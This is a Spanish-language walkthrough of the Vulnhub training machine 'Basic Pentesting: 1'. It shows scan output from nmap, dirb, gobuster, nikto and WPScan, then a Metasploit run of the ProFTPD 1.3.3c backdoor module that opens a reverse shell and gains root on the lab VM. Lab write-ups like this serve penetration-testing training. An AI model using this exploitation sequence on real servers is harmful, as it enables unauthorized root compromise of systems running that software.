Basic Pentesting 1 (Vulnhub)

Vamos a hacer el write-up de esta máquina.

En estos días me he cruzado con esta máquina

Basic Pentesting: 1

Basic Pentesting: 1, made by Josiah Pierce. Download & walkthrough links are available.

Josiah Pierce

Fase de escaneo

Currently scanning: Finished! | Screen View: Unique
Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size:
240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor /
Hostname
-----------------------------------------------------------------------------
10.0.2.1 52:54:00:12:35:00 1 60 Unknown
vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown
vendor
10.0.2.3 08:00:27:e8:77:ae 1 60 PCS
Systemtechnik GmbH
10.0.2.10 08:00:27:3e:c6:50 1 60 PCS
Systemtechnik GmbH

Hemos encontrado un puerto 21, un 22 y un puerto 80 abiertos.
Está corriendo un SO Linux 3.x|4.x más concretamente un Linux 3.2 - 4.14,

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 13:30 WEST
Nmap scan report for 10.0.2.10
Host is up (0.00070s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux;
protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:3E:C6:50 (PCS Systemtechnik/Oracle VirtualBox
virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect
results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds

Versiones y vulnerabilidades

• FTP ProFTPD 1.3.3c Metasploit
• OpenSSH 7.2.p2 Ubuntu 4ubuntu2.2 CVE
• Apache httpd 2.4.18 CVE

Todas las versiones instaladas tienen vulnerabilidades. Al existir una web,
vamos a comprobar que recursos tenemos disponibles.

Dirb

Al usar dirb con el host que tenemos, hemos podido comprobar que dispone de
un blog oculto en el directorio secret, por el tipo de contenido se puede ver que
es un WordPress. Vamos a investigarlo un poco.

┌──(kali㉿kali-vbox)-[~]
└─$ dirb http://10.0.2.10
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jul 22 10:11:06 2025
URL_BASE: http://10.0.2.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS:
4612
---- Scanning URL: http://10.0.2.10/ ----
+ http://10.0.2.10/index.html (CODE:200|
SIZE:177)
==> DIRECTORY: http://10.0.2.10/
secret/
+ http://10.0.2.10/server-status (CODE:403|
SIZE:274)
---- Entering directory: http://10.0.2.10/secret/ ----
+ http://10.0.2.10/secret/index.php (CODE:301|
SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-
admin/
==> DIRECTORY: http://10.0.2.10/secret/wp-
content/
==> DIRECTORY: http://10.0.2.10/secret/wp-
includes/
+ http://10.0.2.10/secret/xmlrpc.php (CODE:405|
SIZE:42)
3/13
---- Entering directory: http://10.0.2.10/secret/wp-admin/ ----
+ http://10.0.2.10/secret/wp-admin/admin.php (CODE:302|
SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
css/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
images/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
includes/
+ http://10.0.2.10/secret/wp-admin/index.php (CODE:302|
SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
js/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
maint/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
network/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
user/
---- Entering directory: http://10.0.2.10/secret/wp-content/ ----
+ http://10.0.2.10/secret/wp-content/index.php (CODE:200|
SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-content/
plugins/
==> DIRECTORY: http://10.0.2.10/secret/wp-content/
themes/
---- Entering directory: http://10.0.2.10/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan
it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.10/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan
it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.10/secret/wp-admin/images/
----
(!) WARNING: Directory IS LISTABLE. No need to scan
it.
(Use mode '-w' if you want to scan it anyway)
4/13
---- Entering directory: http://10.0.2.10/secret/wp-admin/includes/
----
(!) WARNING: Directory IS LISTABLE. No need to scan
it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.10/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan
it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.10/secret/wp-admin/maint/
----
(!) WARNING: Directory IS LISTABLE. No need to scan
it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.10/secret/wp-admin/network/
----
+ http://10.0.2.10/secret/wp-admin/network/admin.php (CODE:302|
SIZE:0)
+ http://10.0.2.10/secret/wp-admin/network/index.php (CODE:302|
SIZE:0)
---- Entering directory: http://10.0.2.10/secret/wp-admin/user/
----
+ http://10.0.2.10/secret/wp-admin/user/admin.php (CODE:302|
SIZE:0)
+ http://10.0.2.10/secret/wp-admin/user/index.php (CODE:302|
SIZE:0)
---- Entering directory: http://10.0.2.10/secret/wp-content/
plugins/ ----
+ http://10.0.2.10/secret/wp-content/plugins/index.php (CODE:200|
SIZE:0)
---- Entering directory: http://10.0.2.10/secret/wp-content/themes/
----
+ http://10.0.2.10/secret/wp-content/themes/index.php (CODE:200|
SIZE:0)
-----------------
END_TIME: Tue Jul 22 10:11:50 2025
DOWNLOADED: 36896 - FOUND: 13

Por ahora en Entering directory: http://10.0.2.10/secret/wp-admin/maint/ aparece un auto reparador de la base de datos.

http://10.0.2.10/secret/xmlrpc.php nos indica:

gobuster

gobuster no nos ofrece nada más de información de la que sabíamos

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.2.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/
directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/secret (Status: 301) [Size: 307] [-->
http://10.0.2.10/secret/]
/server-status (Status: 403) [Size: 274]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

Nikto

Nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.10
+ Target Hostname: 10.0.2.10
+ Target Port: 80
+ Start Time: 2025-07-22 11:18:12 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present.
See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-
Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow
the user agent to render the content of the site in a different
fashion to the MIME type. See: https://www.netsparker.com/web-
vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all
possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least
Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /,
inode: b1, size: 55e1c7758dcdb, mtime: gzip. See: http://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, GET, HEAD .
+ /secret/: Drupal Link header found with value: <http://vtcsec/
secret/index.php/wp-json/>; rel="https://api.w.org/". See: https://
www.drupal.org/
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.
vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8074 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2025-07-22 11:18:37 (GMT1) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nos ofrece la misma información que ya teníamos, no existe ningún directorio
cgi-bin, por tanto, descartamos usar vulnerabilidades tipo shellshock

Puedo jurar que he generado ansiedad por los cgi-bin, lo que me costó con sumo ahora es lo primero que miro 😆

WPScan

__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
______________________________________________________________
[+] URL: http://10.0.2.10/secret/ [10.0.2.10]
[+] Started: Tue Jul 22 11:22:43 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.0.2.10/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/
wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
wordpress_pingback_access/
[+] WordPress readme found: http://10.0.2.10/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.0.2.10/
secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9 identified (Insecure, released on
2017-11-16).
| Found By: Emoji Settings (Passive Detection)
| - http://10.0.2.10/secret/, Match: 'wp-includes\/js\/wp-emoji-
release.min.js?ver=4.9'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.0.2.10/secret/, Match: 'WordPress 4.9'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |
==============================================================================
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has
not been output.
[!] You can get a free API token with 25 daily requests by
registering at https://wpscan.com/register
[+] Finished: Tue Jul 22 11:22:45 2025
[+] Requests Done: 139
[+] Cached Requests: 29
[+] Data Sent: 35.625 KB
[+] Data Received: 19.743 KB
[+] Memory used: 241.145 MB
[+] Elapsed time: 00:00:01

Tras intentar aprovechar algunas vulnerabilidades de manera infructuosa,
vamos a descansar de intentar entrar a través de WordPress e intentar explotar
alguna otra vulnerabilidad, por ejemplo del FTP

Proftpd » 1.3.3 c

Como comprobamos en nuestro escaneo de Nmap, el puerto 21 FTP está abierto y corre la versión 1.3.3 c de Proftpd Fuente: CVE » Proftpd 1.3.3 c

Por descarte hemos probado metasploit y he buscado la versión del FTP

msf6 > search proftpd
Matching Modules
================
# Name
Disclosure Date Rank Check Description
- ----
--------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent
2011-01-08 average No NetSupport Manager Agent Remote
Buffer Overflow
1 exploit/linux/ftp/proftp_sreplace
2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace
Buffer Overflow (Linux)
2 \_ target: Automatic
Targeting . . . .
3 \_ target:
Debug . . . .
4 \_ target: ProFTPD 1.3.0 (source install) / Debian
3.1 . . . .
5 exploit/freebsd/ftp/proftp_telnet_iac
2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet
IAC Buffer Overflow (FreeBSD)
6 \_ target: Automatic
Targeting . . . .
10/13
7 \_ target:
Debug . . . .
8 \_ target: ProFTPD 1.3.2a Server (FreeBSD
8.0) . . . .
9 exploit/linux/ftp/proftp_telnet_iac
2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet
IAC Buffer Overflow (Linux)
10 \_ target: Automatic
Targeting . . . .
11 \_ target:
Debug . . . .
12 \_ target: ProFTPD 1.3.3a Server (Debian) - Squeeze
Beta1 . . . .
13 \_ target: ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1
(Debug) . . . .
14 \_ target: ProFTPD 1.3.2c Server (Ubuntu
10.04) . . . .
15 exploit/unix/ftp/proftpd_modcopy_exec
2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command
Execution
16 exploit/unix/ftp/proftpd_133c_backdoor
2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command
Execution

Encontramos el exploit número 16 con una calificación excellent y acorde a
la versión que está corriendo del servidor FTP

Fase de explotación

Configuramos las opciones del módulo elegido:

Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format
type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see
https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Started reverse TCP double handler on 10.0.2.9:4444
[*] 10.0.2.10:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KtZzHujlaeYveF2f;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KtZzHujlaeYveF2f\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.9:4444 ->
10.0.2.10:44118) at 2025-07-22 12:24:44 +0100

El exploit ha funcionado

Comprobación

cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
12/13
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
whoami
root

¿Quieres estar al día sobre el software libre, redes descentralizadas y el movimiento open source? ¡Suscríbete a mi newsletter! No te pierdas los próximos artículos, recomendaciones de herramientas, y mucho más contenido para un internet más justo y autogestionado.